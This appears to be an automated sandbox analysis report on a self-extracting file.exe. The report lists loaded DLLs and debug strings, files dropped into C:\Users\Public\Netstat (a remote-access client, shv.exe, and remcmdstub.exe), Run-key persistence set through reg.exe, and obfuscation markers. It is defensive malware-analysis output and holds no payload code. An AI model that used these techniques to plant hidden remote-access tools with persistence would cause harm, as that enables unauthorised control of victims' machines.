Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 2283788 > 1048576

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Netstat\shv.exe

6_2_11029590

File is packed with WinRar

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6430546

Jump to behavior

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name: .didat
Source: file.exe	Static PE information: section name: _RDATA
Source: PCICL32.DLL.0.dr	Static PE information: section name: .hhshare

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5156 push rsi; retf	0_2_00007FF70E7C5157
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5166 push rsi; retf	0_2_00007FF70E7C5167
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116F055 push ecx; ret	6_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11169F49 push ecx; ret	6_2_11169F5C
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116F055 push ecx; ret	9_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11169F49 push ecx; ret	9_2_11169F5C

Source: msvcr100.dll.0.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\shv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\PCICL32.DLL	Jump to dropped file

Source: C:\Users\Public\Netstat\shv.exe

6_2_6D1D7030

Source: C:\Users\Public\Netstat\shv.exe

6_2_11127E10

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	6_2_11139090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	6_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	6_2_11113290
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	6_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	6_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11024280
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11112670 IsIconic,GetTickCount,	6_2_11112670
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	6_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	9_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	9_2_11139090
